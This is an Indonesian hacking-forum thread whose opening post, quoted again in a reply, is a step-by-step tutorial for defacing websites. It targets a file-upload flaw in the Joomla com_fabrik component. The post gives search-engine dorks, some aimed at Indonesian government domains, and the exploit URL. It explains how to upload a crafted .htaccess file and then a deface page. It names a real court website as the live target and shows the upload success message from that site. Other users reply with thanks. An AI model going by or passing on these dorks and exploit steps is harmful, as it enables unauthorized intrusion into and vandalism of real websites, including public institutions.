[Share] [NEW] Deface Web On CSRF 2018 DORK
#1
[b]By:Blackowl
Thanks TO http://www.indonesianbacktrack.or.id


Deface Web On CSRF 2018

Method CSRF........

=============[/b]
DORK
=============

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:com
inurl:index.php?option=com_fabrik&view= site:com
inurl:importcsv.php site:com
(Di kembangin ajah )

==============
ALAT &
BAHAN
==============

Csrf Com_Fabrik KLIK me
File .htaccess Touch Me beb
Script Deface HTML sendiri
Exploit /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

==================================
LIVE TARGET : http://xxxxx.xyz
==================================


Toturial

./Nocturnal-start
1) Dorking Seperti Biasa cari site yang kira kira vuln
2) Kalau dah dapet masukan exploit nya contoh
"http://xxxxx.xyz/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
Kalau Vuln muncul tulisan seperti ini

[Image: f5e97-screenshot2bfrom2b2018-02-192b16-47-25.png?w=300]

3) Selanju nya kita edit script csrf nya untuk mengupload file htaccess nya
Edit Yang Bagian Ini saja http://site.com ganti dengan site yang mau di
eksekusi ya :v


[Image: a5b42-screenshot2bfrom2b2018-02-192b16-53-39.png?w=300]

Kalau Udah di edit jangan lupa save ya :v
4) Selanjut nya Edit File  htaccess nya Edit Di Bagian
"DirectoryIndex frogs.html"
frogs.html ganti dengan nama scrip deface kalian
Kalau sudah selesai ngedit nya buka csrf nya
5)  Upload File .htaccess Nya dulu kalau berhasil ada tulisan kayak gini
{"filepath":"\/.htaccess","uri":"http:\/\/pn-maros.go.id\/.htaccess"}
Kalau udah berhasil UP  flie htaccess nya langsung saja up script deface
kalian Kalau Dah Selesai Up .htaccess Dan Script Nya langsung aja cek web
nya
kalau gak ke deface ya cari web lagi jangan putus asa

By:bl4ck0wl

#2
(03-12-2018, 12:52 PM)bl4ck0wl Wrote: [b]By:Blackowl
Thanks TO http://www.indonesianbacktrack.or.id


Deface Web On CSRF 2018

Method CSRF........

=============[/b]
DORK
=============

inurl:index.php?option=com_fabrik
inurl:index.php/component/fabrik/ site:go.id
inurl:index.php?option=com_fabrik&view= site:go.id
inurl:importcsv.php site:go.id
(Di kembangin ajah )

==============
ALAT &
BAHAN
==============

Csrf Com_Fabrik KLIK me
File .htaccess Touch Me beb
Script Deface HTML sendiri
Exploit /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload

==================================
LIVE TARGET : http://pn-maros.go.id
==================================


Toturial

./Nocturnal-start
1) Dorking Seperti Biasa cari site yang kira kira vuln
2) Kalau dah dapet masukan exploit nya contoh
"http://pn-maros.go.id/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload"
Kalau Vuln muncul tulisan seperti ini

[Image: f5e97-screenshot2bfrom2b2018-02-192b16-47-25.png?w=300]

3) Selanju nya kita edit script csrf nya untuk mengupload file htaccess nya
Edit Yang Bagian Ini saja http://site.com ganti dengan site yang mau di
eksekusi ya :v


[Image: a5b42-screenshot2bfrom2b2018-02-192b16-53-39.png?w=300]

Kalau Udah di edit jangan lupa save ya :v
4) Selanjut nya Edit File  htaccess nya Edit Di Bagian
"DirectoryIndex frogs.html"
frogs.html ganti dengan nama scrip deface kalian
Kalau sudah selesai ngedit nya buka csrf nya
5)  Upload File .htaccess Nya dulu kalau berhasil ada tulisan kayak gini
{"filepath":"\/.htaccess","uri":"http:\/\/pn-maros.go.id\/.htaccess"}
Kalau udah berhasil UP  flie htaccess nya langsung saja up script deface
kalian Kalau Dah Selesai Up .htaccess Dan Script Nya langsung aja cek web
nya
kalau gak ke deface ya cari web lagi jangan putus asa

By:bl4ck0wl

keep it up, nice share, btw nakal nih pepes pepes :p


Smile and Agree, Then Do Whatever The Fvck You Were Gonna Do



#3
wkwkw

#4
Terima kasih suhuu

#5
Yaahh padahal laptop lagi rusak wkwkw, gembok aja deh. Thank you sobat.






Users browsing this thread: 1 Guest(s)